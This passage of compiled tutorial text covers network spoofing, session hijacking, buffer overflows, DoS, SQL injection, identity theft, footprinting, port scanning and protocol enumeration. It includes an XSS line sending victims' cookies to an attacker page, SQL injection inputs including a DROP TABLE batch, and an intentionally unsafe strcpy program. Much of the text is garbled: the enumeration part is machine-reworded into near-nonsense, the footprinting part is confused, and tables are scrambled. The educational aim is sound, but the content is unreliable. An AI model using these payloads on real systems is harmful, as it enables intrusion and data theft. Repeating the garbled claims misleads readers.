packet sniffing are just a few examples.
 Static ARP entries: It entails creating an ARP entry in each computer for
each machine on the network. Because the machines can ignore ARP
replies, mapping them with sets of static IP and MAC addresses helps to
prevent spoofing attempts. Regrettably, this approach can only defend you
from some of the most basic attacks.
 Encryption: Protocols like HTTPS and SSH can also help to reduce the
probability of an ARP poisoning attempt succeeding. When traffic is
encrypted, the attacker must go through the extra effort of convincing the
 target’s browser to accept an invalid certificate. Any data sent outside of
these standards, however, will remain vulnerable.
 VPN: Individuals may find a VPN to be reasonable protection, but they
are rarely suitable for larger enterprises. A VPN will encrypt all data that
flows between the client and the exit server if it is only one person making a
potentially unsafe connection, such as accessing public wifi at an airport.
Since an attacker will only be able to see the ciphertext, this helps to keep
them safe.
 Packet filters: Each packet delivered across a network is inspected by
these filters. They can detect and prevent malicious transmissions as well as
those with suspected IP addresses.
For more detail regarding MITM attacks using ARP spoofing please refer to
the MITM (Man in The Middle) Attack using ARP Poisoning.
Email Spoofing:
The most common type of identity theft on the Internet is email spoofing.
Phishers, send emails to many addresses and pose as representatives of
banks, companies, and law enforcement agencies by using official logos and
headers. Links to dangerous or otherwise fraudulent websites, as well as
attachments loaded with malicious software, are included in the emails they
send.
Attackers may also utilize social engineering techniques to persuade the target
to voluntarily reveal information. Fake banking or digital wallet websites are
frequently created and linked to in emails. When an unknowing victim clicks on
that link, they are brought to a false site where they must log in with their
information, which is then forwarded to the fake user behind the fake email.
Manual Detection Method:
 Even though the display name appears to be real, if it does not match the
“From” address, it is an indication of email spoofing.
 Mail is most likely fake if the “Reply-to” address does not match the
original sender’s address or domain.
 Unexpected messages (such as a request for sensitive information or an
unwanted attachment) should be opened with caution or reported
immediately to your IT department, even if the email appears to come from a
trustworthy source.
Preventive measures:
Implement additional checks like Sender Policy Framework, DomainKeys
Identified Mail, Domain-based Message Authentication Reporting &
Conformance, and Secure/Multipurpose Internet Mail Extensions.
Website Spoofing Attack:
Attackers employ website/URL spoofing, also known as cybersquatting, to steal
credentials and other information from unwary end-users by creating a website
that seems almost identical to the actual trustworthy site. This is frequently
done with sites that receive a lot of traffic online. The cloning of Facebook is a
good example.
DNS Spoofing:
Each machine has a unique IP address. This address is not the same as the
usual “www” internet address that you use to access websites. When you type a
web address into your browser and press enter, the Domain Name System
(DNS) immediately locates and sends you to the IP address that matches the
domain name you provided. Hackers have discovered a technique to infiltrate
this system and redirect your traffic to harmful sites. This is known as DNS
Spoofing.
Preventive measures:
 DNSSEC or Domain Name System Security Extension Protocol is the
most widely used DNS Spoofing prevention solution since it secures the
DNS by adding layers of authentication and verification. However, it takes
time to verify that the DNS records are not forged, this slows down the DNS
response.
 Make use of SSL/TLS encryption to minimize or mitigate the risk of a
website being hacked via DNS spoofing. This allows a user to determine
whether the server is real and belongs to the website’s original owner.
 Only trust URLs that begin with “HTTPS,” which signifies that a website is
legitimate. Consider the risk of a DNS Spoofing Attack if the indicator of
“HTTPS” looks to be in flux.
 The security strategy or proactive approach to preventing a DNS attack is
active monitoring. It’s important to keep an eye on DNS data and be
proactive about noticing unusual patterns of behavior, such as the
appearance of a new external host that could be an attacker.
Spoofing is the most popular strategy utilized by advertisers these days. It is
quite simple for them to utilize because it includes a range of ways to perform it.
The above are a few instances of spoofing and preventative steps that will
make our organization safer.
What is Session Hijacking?
TCP session hijacking is a security attack on a user session over a protected
network. The most common method of session hijacking is called IP spoofing,
when an attacker uses source-routed IP packets to insert commands into an
active communication between two nodes on a network and disguise itself as
one of the authenticated users. This type of attack is possible because
authentication typically is only done at the start of a TCP session.
Another type of session hijacking is known as a man-in-the-middle attack,
where the attacker, using a sniffer, can observe the communication between
devices and collect the data that is transmitted.
Different ways of session hijacking :
There are many ways to do Session Hijacking. Some of them are given below –

 Using Packet Sniffers

In the above figure, it can be seen that attack captures the victim’s
session ID to gain access to the server by using some packet sniffers.
 Cross Site Scripting(XSS Attack)
Attacker can also capture victim’s Session ID using XSS attack by
using javascript. If an attacker sends a crafted link to the victim with
the malicious JavaScript, when the victim clicks on the link, the
JavaScript will run and complete the instructions made by the attacker.
 <SCRIPT type="text/javascript">

var adr = '../attacker.php?victim_cookie=' + escape(document.cookie);

</SCRIPT>


  IP Spoofing
Spoofing is pretending to be someone else. This is a technique used
to gain unauthorized access to the computer with an IP address of a
trusted host. In implementing this technique, attacker has to obtain the
IP address of the client and inject his own packets spoofed with the IP
address of client into the TCP session, so as to fool the server that it is
communicating with the victim i.e. the original host.
 Blind Attack
If attacker is not able to sniff packets and guess the correct sequence
number expected by server, brute force combinations of sequence
number can be tried.
Mitigation
To defend a network with session hijacking, a defender has to implement both
security measures at Application level and Network level. Network level hijacks
can be prevented by Ciphering the packets so that the hijacker cannot decipher
the packet headers, to obtain any information which will aid in spoofing. This
encryption can be provided by using protocols such as IPSEC, SSL, SSH etc.
Internet security protocol (IPSEC) has the ability to encrypt the packet on some
shared key between the two parties involved in communication. IPsec runs in
two modes: Transport and Tunnel.
In Transport Mode only the data sent in the packet is encrypted while in Tunnel
Mode both packet headers and data are encrypted, so it is more restrictive.
Session hijacking is a serious threat to Networks and Web applications on web
as most of the systems are vulnerable to it.
A buffer is a temporary area for data storage. When more data (than was
originally allocated to be stored) gets placed by a program or system process,
the extra data overflows. It causes some of that data to leak out into other
buffers, which can corrupt or overwrite whatever data they were holding.
In a buffer-overflow attack, the extra data sometimes holds specific
instructions for actions intended by a hacker or malicious user; for example, the
data could trigger a response that damages files, changes data or unveils
private information.
Attacker would use a buffer-overflow exploit to take advantage of a program
that is waiting on a user’s input. There are two types of buffer overflows: stack-
based and heap-based. Heap-based, which are difficult to execute and the least
common of the two, attack an application by flooding the memory space
reserved for a program. Stack-based buffer overflows, which are more common
among attackers, exploit applications and programs by using what is known as
a stack memory space used to store user input.
Let us study some real program examples that show the danger of such
situations based on the C.
In the examples, we do not implement any malicious code injection but just to
 show that the buffer can be overflow. Modern compilers normally provide
overflow checking option during the compile/link time but during the run time it
is quite difficult to check this problem without any extra protection mechanism
such as using exception handling.

 C

// A C program to demonstrate buffer overflow

#include <stdio.h>

#include <string.h>

#include <stdlib.h>

int main(int argc, char *argv[])

// Reserve 5 byte of buffer plus the terminating NULL.

// should allocate 8 bytes = 2 double words,

// To overflow, need more than 8 bytes...

char buffer[5]; // If more than 8 characters input

// by user, there will be access

// violation, segmentation fault

// a prompt how to execute the program...

 if (argc < 2)

printf("strcpy() NOT executed....\n");

printf("Syntax: %s <characters>\n", argv[0]);

exit(0);

// copy the user input to mybuffer, without any

// bound checking a secure version is strcpy_s()

strcpy(buffer, argv[1]);

printf("buffer content= %s\n", buffer);

// you may want to try strcpy_s()

printf("strcpy() executed...\n");

return 0;

Compile this program in Linux and for output use command output_file
INPUT

Input : 12345678 (8 bytes), the program run smoothly.

Input : 123456789 (9 bytes)
"Segmentation fault" message will be displayed and the program
terminates.
The vulnerability exists because the buffer could be overflowed if the user input
(argv[1]) bigger than 8 bytes. Why 8 bytes? For 32 bit (4 bytes) system, we
must fill up a double word (32 bits) memory. Character (char) size is 1 byte, so
if we request buffer with 5 bytes, the system will allocate 2 double words (8
bytes). That is why when you input more than 8 bytes; the mybuffer will be over
flowed
Similar standard functions that are technically less vulnerable, such as
strncpy(), strncat(), and memcpy(), do exist. But the problem with these
functions is that it is the programmer responsibility to assert the size of the
buffer, not the compiler.
Every C/C++ coder or programmer must know the buffer overflow problem
before they do the coding. A lot of bugs generated, in most cases can be
exploited as a result of buffer overflow.
REFERENCES
Wikipedia
BufferOverflow
c++BufferOverflow
This article is contributed by Akash Sharan. If you like GeeksforGeeks and
would like to contribute, you can also write an article
using write.geeksforgeeks.org or mail your article to review-
team@geeksforgeeks.org. See your article appearing on the GeeksforGeeks
main page and help other Geeks.
Please write comments if you find anything incorrect, or you want to share more
information about the topic discussed above.

DOS Attack is a denial of service attack, in this attack a computer sends a

massive amount of traffic to a victim’s computer and shuts it down. Dos attack
is an online attack that is used to make the website unavailable for its users
when done on a website. This attack makes the server of a website that is
connected to the internet by sending a large number of traffic to it.
2. DDOS Attack means distributed denial of service in this attack dos attacks
are done from many different locations using many systems.
Difference between DOS and DDOS attacks:

DOS DDOS

DDOS Stands for Distributed Denial of

DOS Stands for Denial of service attack.
service attack.
 DOS DDOS

In Dos attack single system targets the In DDoS multiple systems attacks the victims
victim system. system..

Victim PC is loaded from the packet of Victim PC is loaded from the packet of data
data sent from a single location. sent from Multiple location.

Dos attack is slower as compared to

DDoS attack is faster than Dos Attack.
DDoS.

It is difficult to block this attack as multiple

Can be blocked easily as only one system
devices are sending packets and attacking
is used.
from multiple locations.

In DOS Attack only single device is used In DDoS attack,The volumeBots are used to
with DOS Attack tools. attack at the same time.

DOS Attacks are Easy to trace. DDOS Attacks are Difficult to trace.

DDoS attacks allow the attacker to send

Volume of traffic in the Dos attack is less
massive volumes of traffic to the victim
as compared to DDos.
network.

Types of DOS Attacks are: 1. Buffer

Types of DDOS Attacks are: 1. Volumetric
overflow attacks 2. Ping of Death or
Attacks 2. Fragmentation Attacks 3.
ICMP flood 3. Teardrop Attack 4.
Application Layer Attacks 4. Protocol Attack.
Flooding Attack

SQL injection is a technique used to extract user data by injecting web page
inputs as statements through SQL commands. Basically, malicious users can
use these instructions to manipulate the application’s web server.
1. SQL injection is a code injection technique that can compromise your
database.
2. SQL injection is one of the most common web hacking techniques.
3. SQL injection is the injection of malicious code into SQL statements via
web page input.
The Exploitation of SQL Injection in Web Applications
Web servers communicate with database servers anytime they need to retrieve
or store user data. SQL statements by the attacker are designed so that they
can be executed while the web server is fetching content from the application
server. It compromises the security of a web application.
Example of SQL Injection
Suppose we have an application based on student records. Any student can
view only his or her own records by entering a unique and private student ID.
Suppose we have a field like the one below:
Student id: The student enters the following in the input field: 12222345 or
1=1.
Query:
SELECT * from STUDENT where
STUDENT-ID == 12222345 or 1 = 1
Now, this 1=1 will return all records for which this holds true. So basically, all
the student data is compromised. Now the malicious user can also delete the
student records in a similar fashion. Consider the following SQL query.
Query:
SELECT * from USER where
USERNAME = “” and PASSWORD=””
Now the malicious can use the ‘=’ operator in a clever manner to retrieve
private and secure user information. So instead of the above-mentioned query
the following query when executed retrieves protected data, not intended to be
shown to users.
Query:
Select * from User where
(Username = “” or 1=1) AND
(Password=”” or 1=1).
Since 1=1 always holds true, user data is compromised.
Impact of SQL Injection
The hacker can retrieve all the user data present in the database such as user
details, credit card information, and social security numbers, and can also gain
access to protected areas like the administrator portal. It is also possible to
delete user data from the tables.
Nowadays, all online shopping applications and bank transactions use back-
end database servers. So in case the hacker is able to exploit SQL injection,
the entire server is compromised.
Preventing SQL Injection
 User Authentication: Validating input from the user by pre-defining length,
type of input, of the input field and authenticating the user.
 Restricting access privileges of users and defining how much amount of
data any outsider can access from the database. Basically, users should not
be granted permission to access everything in the database.
 Do not use system administrator accounts.
For more details, you can refer to How to Protect Against SQL Injection
Attacks? article.
SQL in Web Pages
SQL injection typically occurs when you ask a user for input, such as their
username/user ID, instead of their name/ID, and the user gives you an SQL
statement that you execute without the knowledge about your database.
txtUserId = getRequestString("UserId");
txtSQL = "SELECT * FROM Users
WHERE UserId = " + txtUserId;
SQL Injection Based on Batched SQL Statements
1. Most databases guide batch SQL statements.
2. A batch of SQL statements is a collection of two or more square
statements separated by using semicolons.
The SQL declaration underneath will return all rows from the “users” desk after
which delete the “Employees ” table.
Query:
SELECT * FROM Users;
DROP TABLE Employees
Look at the following example:
Syntax:
txtEmpId = getRequestString("EmpId");
txtSQL = "SELECT * FROM Users
WHERE EmpId = " + txtEmpId;
The valid SQL statement would look like this:
Identity Theft also called Identity Fraud is a crime that is being committed by a
huge number nowadays. Identity theft happens when someone steals your
personal information to commit fraud. This theft is committed in many ways by
gathering personal information such as transactional information of another
person to make transactions.
Prerequisite – Cyber Crime, and Cybercrime causes and measures to prevent
it
Example: Thieves use different mechanisms to extract information about
customers’ credit cards from corporate databases, once they are aware of the
information they can easily degrade the rating of the victim’s credit card. Having
this information with the thieves can make you cause huge harm if not notified
early. With these false credentials, they can obtain a credit card in the name of
the victim which can be used for covering false debts.
Types of Identity Thefts:
There are various amount of threats but some common ones are :
 Criminal Identity Theft – This is a type of theft in which the victim is
charged guilty and has to bear the loss when the criminal or the thief backs
up his position with the false documents of the victim such as ID or other
verification documents and his bluff is successful.
 Senior Identity Theft – Seniors with age over 60 are often targets of
identity thieves. They are sent information that looks to be actual and then
their personal information is gathered for such use. Seniors must be aware
of not being the victim.
 Driver’s license ID Identity Theft – Driver’s license identity theft is the
most common form of ID theft. All the information on one’s driver’s license
provides the name, address, and date of birth, as well as a State driver’s
identity number. The thieves use this information to apply for loans or credit
cards or try to open bank accounts to obtain checking accounts or buy cars,
houses, vehicles, electronic equipment, jewelry, anything valuable and all
are charged to the owner’s name.
 Medical Identity Theft – In this theft, the victim’s health-related
information is gathered and then a fraud medical service need is created
with fraud bills, which then results in the victim’s account for such services.
 Tax Identity Theft – In this type of attack attacker is interested in
knowing your Employer Identification Number to appeal to get a tax refund.
This is noticeable when you attempt to file your tax return or the Income Tax
return department sends you a notice for this.
 Social Security Identity Theft – In this type of attack the thief intends to
know your Social Security Number (SSN). With this number, they are also
aware of all your personal information which is the biggest threat to an
individual.
 Synthetic Identity Theft – This theft is uncommon to the other thefts,
thief combines all the gathered information of people and they create a new
identity. When this identity is being used than all the victims are affected.
 Financial Identity Theft – This type of attack is the most common type of
attack. In this, the stolen credentials are used to attain a financial benefit.
The victim is identified only when he checks his balances carefully as this is
practiced in a very slow manner.
Techniques of Identity Thefts : Identity thieves usually hack into corporate
databases for personal credentials which requires effort but with several social-
engineering techniques, it is considered easy. Some common identity theft
techniques are:
 Pretext Calling – Thieves pretending to be an employee of a company
over phone asking for financial information are an example of this theft.
Pretending as legitimate employees they ask for personal data with some
buttery returns.
 Mail Theft – This is a technique in which credit card information with
transactional data is extracted from the public mailbox.
 Phishing – This is a technique in which emails pertaining to be from
banks are sent to a victim with malware in it. When the victim responds to
mail their information is mapped by the thieves.
 Internet – Internet is widely used by the world as attackers are aware of
many techniques of making users get connected with public networks over
Internet which is controlled by them and they add spyware with downloads.
 Dumpster Diving – This is a technique that has made much information
out of the known institutions. As garbage collectors are aware of this they
search for account related documents that contain social security numbers
with all the personal documents if not shredded before disposing of.
 Card Verification Value (CVV) Code Requests – The Card Verification
Value number is located at the back of your debit cards. This number is used
to enhance transaction security but several attackers ask for this number
while pretending as a bank official.
Steps Of Prevention From Identity Theft:
Following are some methods by which you can enhance your security for
identity thefts :
1. Use Strong Passwords and do not share your PIN with anyone on or off
the phone.
2. Use two-factor notification for emails.
3. Secure all your devices with a password.
4. Don’t install random software from the internet.
5. Don’t post sensitive information over social media.
6. While entering passwords at payment gateway ensure its authenticity.
7. Limit the personal information to be carried with out.
8. Keep a practice of changing your PIN and password regularly.
9. Do not disclose your information over phone.
10. While traveling do not disclose personal information with strangers.
11. Never share your Aadhaar/PAN number (In India) with anyone whom you
do not know/trust.
12. Never share your SSN (In US) with anyone whom you do not know/trust.
13. Do not make all the personal information on your social media accounts
public.
14. Please never share an Aadhaar OTP received on your phone with
someone over a call.
15. Make sure that you do not receive unnecessary OTP SMS about Aadhaar
(if you do, your Aadhaar number is already in the wrong hands).
16. Do not fill personal data on the website that claims to offer benefits in
return.
17. Last, be a keeper of personal knowledge.
Social engineering is the act of manipulating people into giving up private or
confidential information by appearing to be a likely insiders. For example,
asking a person for help with your car and saying you know someone who can
fix it if they get you keys to the vehicle. Some people might trust that story and
give up their keys, but others might see social engineering as a scam and not
hand over any personal information.

Methodology:
Footprinting is an assault using various sorts of distractions in order to gain
access to the target’s office or building without any suspicion being raised. This
is beneficial when an attacker wants to do something illegal, such as stealing
files from confidential or proprietary files on company computers, committing
fraud, etc. Footprinting is a much less stealthy method than social engineering,
but it always has the advantage of having a low profile and a low chance of
being caught. Footprinting is useful in cases where an attacker does not have
any special access to the target building and wants to get into it. For example, if
someone wanted to commit fraud in a bank and did not know any employees or
had no contact with banks previously, footprinting would be used to gain access
because an attacker or fraudster would not have any previous information on
bank employees or customs they follow so footprinting is the best way for him to
find out information about them. These are all valuable pieces of information
when wanting to commit fraud in a bank.

Information Gathering Methods:

Social engineering is the act of attempting to manipulate individuals into

performing actions or divulging confidential information by direct contact, fake
authority, or pretending the appearance of legitimacy. From pretending to be a
representative from your company in order to inquire confidential information
out of a user on the phone to simply walking up behind someone while they are
focused on their device screen and trying to get them to disclose passwords
and personal data, social engineering can happen anywhere and offer
immediate rewards.
 Eavesdropping: Listening in on a conversation without being
noticed. Eavesdropping is a particularly common, and arguably the most
effective, type of social engineering. We hear stories of people stealing
information every day through phone hacking, but there’s another type of
eavesdropping that accounts for millions upon millions of security
breaches every year, information being obtained by tapping into someone’s
conversation without them realizing it.
 Shoulder Surfing: Looking over someone’s shoulder to see what they’re
looking at on their screen without their consent. There are actually a number
 of different types of shoulder surfing, and the most common is simply looking
over a monitor to see what someone is seeing.
 Dumpster Diving: A variation of social engineering that involves specific
tactics and equipment used on digital systems like smartphones and laptops.
The act of retrieving discarded data or equipment from trashes.
Footprinting Tools:
 Social Engineering Framework
 Hackers, the Journal
 Vulnerable Web Apps Fingerprinting
 PhishingLabs
 Passive Information Gathering
 Google Hacking Database
Countermeasures:
 Footprints can be left in a way that they will not appear obvious to others.
 Footprinting can be done to obtain more information about the building.
 Employees are the only ones who have access to buildings and the
belongings inside them. Footprinting employees in a target building can be
useful for an attacker because it can give him an idea of what codes or keys
he needs to get in, for example, if he wants to steal something from a secure
area of a building.
 Footprinting can also be used as an attempt to gain the trust of people.
Conclusion:
Footprinting can be used for several purposes, all depending on the attacker’s
situation, and as long as there is no reason to hide its existence. While it can be
done in a more subtle way when compared to social engineering methods, it
can also be done in an obvious manner. Footprinting requires the attacker to
have information on the building or location he wants to gain access to so that
he will know what is going on inside of it. This makes footprinting very useful in
cases where an attacker does not have any special access to a target building
and wants to get inside it but has no previous knowledge of how they work or
who they are guarding against.
use various different methods to carry out the execution of Cyber-Attacks on the
computer network, depending on the ease through which the computer network
can be attacked on its vulnerability. Each type of Cyber-Attack is risky and
harmful in nature. Awareness about cyber crimes is very important for today’s
young generation to prevent cyber crimes from taking place and feel safe while
using the internet / cyber technology.
Here, we will discuss one such very harmful Cyber-Attack Port Scanning Attack.
Port Scan attack:
 A Port Scan attack is a dangerous type of Cyber-Attack revolving around
targeting open ports that are vulnerable to attack.
 A Port scan attack helps attackers to identify open points to enter into a
cyber network and attack the user.
 Ports are really significant as they help in tracking the traffic that enters
and leaves a computer network.
Packets and data that are transmitted over ports tell Cyber-Attackers if the
specific port can be vulnerable to attack.
 Port scanning attack helps identify of security mechanisms of the
network, including active firewalls and anti-viruses.
 In this attack, Cyber-Attackers look for open ports in the network, which
they then aim to capture to send and receive information.
 The detected open port is used by Cyber-Attackers to exploit computer
system vulnerabilities.
 The identification of open ports gives Cyber-Attackers direct access to the
target.
 Since the application listens to these ports, Cyber-Attackers take
advantage of this for getting access/ manipulating/deleting confidential user
information.
 Nmap, Netcat, and IP Scanning tools are used to scan ports for
vulnerability checks.

Aim and Consequences:

 Port scan attack is being used by attackers based on the services and
security of the cyber network.
 If proper security mechanisms including authentication methods are not
properly implemented, then they become a target attack point for Cyber-
Attackers.
 Cybercriminals make use of the vulnerable target security breaches and
open port information to get into the user/ organization systems.

Prevention:

The preventive ways for Port Scan attack are listed as follows :
 Secured Firewalls:
 A firewall can be used to track the traffic of open ports, including
both incoming and outgoing traffic from the network.
 Identification of an open port is that the target post involved here is
bound to respond with packets, which shows that the target host
listens on the port.
 Strong Security Mechanisms:
 Computer systems with strong security can protect open ports from
being exploited.
 Security administrators should be well aware that any harmful
attack should not be allowed access to computer open ports.

Enumeration is fundamentally checking. An attacker sets up a functioning

associated with the objective host. The weaknesses are then tallied and
evaluated. It is done mostly to look for assaults and dangers to the objective
framework. Enumeration is utilized to gather usernames, hostname, IP
addresses, passwords, arrangements, and so on. At the point when a
functioning connection with the objective host is set up, hackers oversee the
objective framework. They at that point take private data and information. Now
and again, aggressors have additionally been discovered changing the setup of
the objective frameworks. The manner in which the connection is set up to the
host decides the information or data the attacker will have the option to get to.
Types Of Enumeration
In this section, we will be discussing the various types of Enumerations.
1. NetBIOS(Network Basic Input Output System) Enumeration:
 NetBIOS name is an exceptional 16 ASCII character string used to
distinguish the organization gadgets over TCP/IP, 15 characters are utilized
for the gadget name and the sixteenth character is saved for the
administration or name record type.
 Programmers utilize the NetBIOS enumeration to get a rundown of PCs
that have a place with a specific domain, a rundown of offers on the
individual hosts in the organization, and strategies and passwords.
 NetBIOS name goal isn’t supported by Microsoft for Internet Protocol
Version 6.
 The initial phase in specifying a Windows framework is to exploit the
NetBIOS API. It was initially an Application Programming Interface(API) for
custom programming to get to LAN assets. Windows utilizes NetBIOS for
document and printer sharing.
 A hacker who finds a Windows OS with port 139 open, can verify what
assets can be gotten to or seen on the far off framework. In any case, to
count the NetBIOS names, the distant framework probably empowered
document and printer sharing. This sort of enumeration may empower the
programmer to peruse or keep in touch with the distant PC framework,
contingent upon the accessibility of offers, or dispatch a DoS.
 NetBIOS name list:
Name NetBIOS Code Type

<host name> <00> UNIQUE

<domain> <00> GROUP

<host name> <03> UNIQUE

<username> <03> UNIQUE

<host name> <20> UNIQUE

<domain> <1D> GROUP

<domain> <1B> UNIQUE

 Nbtstat Utility: In Windows, it shows NetBIOS over TCP/IP (NetBT)

convention insights, NetBIOS name tables for both the neighborhood and
distant PCs, and the NetBIOS name reserve. This utility allows a resuscitate
of the NetBIOS name cache and the names selected with Windows Internet
Name Service. The sentence structure for Nbtstat:
nbtstat [-a RemoteName] [-A IPAddress] [-c] [-n] [-r] [-R] [-RR] [-s]
[-S] [Interval]
The table appeared beneath shows different Nbtstat boundaries:

Parameters

-a RemoteName
 Parameters

-A IPAddress

-c

-n

-r

-RR

-s

-S

Interval

2. SNMP(Simple Network Management Protocol) Enumeration:

 SNMP enumeration is a cycle of specifying client records and gadgets on
an objective framework utilizing SNMP. SNMP comprises a manager and a
specialist; specialists are inserted on each organization gadget, and the
trough is introduced on a different PC.
 SNMP holds two passwords to get to and design the SNMP specialist
from the administration station. Read Community String is public of course;
permits review of gadget/framework setup. Read/Write people group string is
private of course; permits far off altering of arrangement.
 Hackers utilize these default network strings to remove data about a
gadget. Hackers list SNMP to remove data about organization assets, for
example, has, switches, gadgets, shares, and so on, and network data, for
example, ARP tables, directing tables, traffic, and so forth.
 SNMP utilizes dispersed engineering containing SNMP agents,
managers, and a few related parts. Orders related with SNMP include:
GetRequest, GetNextRequest, GetResponse, SetRequest, Trap.
Given below is the communication between the SNMP agent and manager:
 SNMP Enumeration tools are utilized to examine a solitary IP address or
a scope of IP addresses of SNMP empowered organization gadgets to
screen, analyze, and investigate security dangers. Instances of this sort of
instruments incorporate NetScanTolls Pro, SoftPerfect Network Scanner,
SNMP Informant, and so forth
3. LDAP Enumeration:
 Lightweight Directory Access Protocol is an Internet Protocol for getting to
dispersed registry administrations.
 Registry administrations may give any coordinated arrangement of
records, regularly in a hierarchical and sensible structure, for example, a
corporate email index.
 A customer starts an LDAP meeting by associating with a Directory
System Agent on TCP port 389 and afterward sends an activity solicitation to
the DSA.
 Data is sent between the customer and the worker utilizing Basic
Encoding Rules.
 Programmer inquiries LDAP administration to assemble information such
as substantial usernames, addresses, division subtleties, and so on that can
be additionally used to perform assaults.
 There are numerous LDAP enumeration apparatuses that entrance the
registry postings inside Active Directory or other catalog administrations.
Utilizing these devices, assailants can identify data, for example, substantial
usernames, addresses, division subtleties, and so forth from various LDAP
workers.
 Examples of these kinds of tools include LDAP Admin Tool, Active
Directory Explorer, LDAP Admin, etc.
4. NTP Enumeration:
 Network Time Protocol is intended to synchronize clocks of arranged
PCs.
 It utilizes UDP port 123 as its essential method for correspondence.
 NTP can check time to inside 10 milliseconds (1/100 seconds) over the
public web.
 It can accomplish correctness of 200 microseconds or better in a
neighborhood under ideal conditions.
 Executives regularly disregard the NTP worker regarding security. Be that
as it may, whenever questioned appropriately, it can give important
organization data to the programmers.
 Hackers inquiries NTP workers to assemble significant data, for example,
a list of hosts associated with NTP workers, Clients’ IP addresses in an
organization, their framework names and Oss, and Internal IPs can likewise
be gotten if NTP worker is in the demilitarized zone.
 NTP enumeration tools are utilized to screen the working of SNTP and
NTP workers present in the organization and furthermore help in the
configuration and confirmation of availability from the time customer to the
NTP workers.
5. SMTP Enumeration:
 Mail frameworks ordinarily use SMTP with POP3 and IMAP that
empowers clients to spare the messages in the worker letter drop and
download them once in a while from the mainframe.
 SMTP utilizes Mail Exchange (MX) workers to coordinate the mail through
DNS. It runs on TCP port 25.
 SMTP provides 3 built-in commands: VRFY, EXPN, RCPT TO.
 These servers respond differently to the commands for valid and invalid
users from which we can determine valid users on SMTP servers.
 Hackers can legitimately associate with SMTP through telnet brief and
gather a rundown of substantial clients on the mainframe.
 Hackers can perform SMTP enumeration using command-line utilities
such as telnet, netcat, etc., or by using tools such as Metasploit, Nmap,
NetScanTools Pro, etc.
6. DNS Enumeration using Zone Transfer:
 It is a cycle for finding the DNS worker and the records of an objective
organization.
 A hacker can accumulate significant organization data, for example, DNS
worker names, hostname, machine names, usernames, IPs, and so forth of
the objectives.
 In DNS Zone Transfer enumeration, a hacker tries to retrieve a copy of
the entire zone file for a domain from the DNS server.
 In order to execute a zone transfer, the hacker sends a zone transfer
request to the DNS server pretending to be a client; the DNS then sends a
portion of its database as a zone to you. This zone may contain a ton of data
about the DNS zone organization.
7. IPsec Enumeration:
 IPsec utilizes ESP (Encapsulation Security Payload), AH (Authentication
Header), and IKE (Internet Key Exchange) to make sure about the
correspondence between virtual private organization (VPN) end focuses.
 Most IPsec-based VPNs use the Internet Security Association and Key
Management Protocol, a piece of IKE, to establish, arrange, alter, and erase
Security Associations and cryptographic keys in a VPN climate.
 A straightforward checking for ISAKMP at the UDP port 500 can
demonstrate the presence of a VPN passage.
 Hackers can research further utilizing an apparatus, for example, IKE-
output to identify the delicate information including encryption and hashing
calculation, authentication type, key conveyance calculation, and so forth.
8. VoIP(Voice over IP) Enumeration:
 VoIP uses the SIP (Session Initiation Protocol) protocol to enable voice
and video calls over an IP network.
 SIP administration by and large uses UDP/TCP ports 2000, 2001, 5050,
5061.
 VoIP enumeration provides sensitive information such as VoIP
gateway/servers, IP-PBX systems, client software, and user extensions.
 This information can be used to launch various VoIP attacks such as
DoS, Session Hijacking, Caller ID spoofing, Eavesdropping, Spamming over
Internet Telephony, VoIP phishing, etc.
9. RPC Enumeration:
 Remote Procedure Call permits customers and workers to impart in
disseminated customer/worker programs.
 Counting RPC endpoints empower aggressors to recognize any weak
administrations on these administration ports.
 In networks ensured by firewalls and other security establishments, this
portmapper is regularly sifted. Along these lines, hackers filter high port
reaches to recognize RPC administrations that are available to coordinate an
assault.
10. Unix/Linux User Enumeration:
 One of the most vital steps for conducting an enumeration is to perform
this kind of enumeration. This provides a list of users along with details like
username, hostname, start date and time of each session, etc.
 We can use command-line utilities to perform Linux user enumeration like
users, rwho, finger, etc.
11. SMB Enumeration:
 SMB list is significant expertise for any pen-tester. Prior to figuring out
how to count SMB, we should initially realize what SMB is. SMB represents
server message block.
 It’s a convention for sharing assets like records, printers, by and large,
any asset which should be retrievable or made accessible by the server. It
fundamentally runs on port 445 or port 139 relying upon the server.
 It is quite accessible in windows, so windows clients don’t have to
arrange anything extra as such other than essential set up. In Linux in any
case, it is somewhat extraordinary. To make it work for Linux, you have to
introduce a samba server since Linux locally doesn’t utilize SMB convention.
 Clearly, some kind of confirmation will be set up like a username and
secret word, and just certain assets made shareable. So dislike everybody
can get to everything, a solid confirmation.
 The main evident defect is utilizing default certifications or effectively
guessable and sometimes even no verification for access of significant
assets of the server. Administrators should make a point to utilize solid
passwords for clients who need to get to assets utilizing SMB. The
subsequent blemish is the samba server. Samba servers are infamous for
being hugely vulnerable.

Mitigation Of Different Types Of Enumeration

There are several countermeasures which can be taken into account for the
mitigation of several kinds of enumeration:
1. NetBIOS Enumeration:
 Disable SMB and NetBIOS.
 Use a network firewall.
 Prefer Windows firewall/ software firewalls.
 Disable sharing.
2. SNMP Enumeration:
 Eliminate the specialist or shut off the SNMP administration.
 In the event that stopping SNMP isn’t a choice, at that point change the
default network string names.
 Move up to SNMP3, which encodes passwords and messages.
 Actualize the Group Policy security alternative.
3. LDAP Enumeration:
 Utilize SSL technology to encrypt the traffic.
 Select a username unique in relation to your email address and empower
account lockout.
4. NTP Enumeration:
 Configure MD5 Layer.
 Configure NTP Authentication.
 Upgrade NTP version.
5. SMTP Enumeration:
 Ignore email messages to unknown recipients.
 Disable open relay feature.
 Breaking point the number of acknowledged associations from a source
to forestall brute force exploits.
 Not to include sensitive mail server and localhost information in mail
responses.
6. DNS Enumeration Using Zone Transfer:
 Incapacitate the DNS Zone moves to the untrusted hosts.
 Make sure that the private hosts and their IP addresses are not published
in DNS zone files of the public DNS server.
 Use premium DNS regulation services that hide sensitive information
such as host information from the public.
 Utilize standard organization administrator contacts for DNS enlistment to
maintain a strategic distance from social designing assaults.
 Avoid publishing Private IP address information into the zone file.
 Disable Zone Transfer for untrusted hosts.
 Hide Sensitive information from public hosts.
7. IPsec Enumeration:
 Preshared keys utilized with both fundamental and forceful mode IKE key
trade components are available to sniffing and disconnected savage power
granulating assaults to bargain the shared mystery. You should utilize
advanced testaments or two-factor validation components to refute these
dangers.
 Pre-shared keys and forceful mode IKE uphold is a catastrophe waiting to
happen. On the off chance that you should uphold forceful mode IKE, utilize
advanced declarations for verification.
 Forcefully firewall and channel traffic coursing through VPN encrypted
tunnel so that, in case of a trade-off, network access is restricted. This point
is particularly significant while giving versatile clients network access,
instead of branch workplaces.
 Where conceivable, limit inbound IPsec security relationship to explicit IP
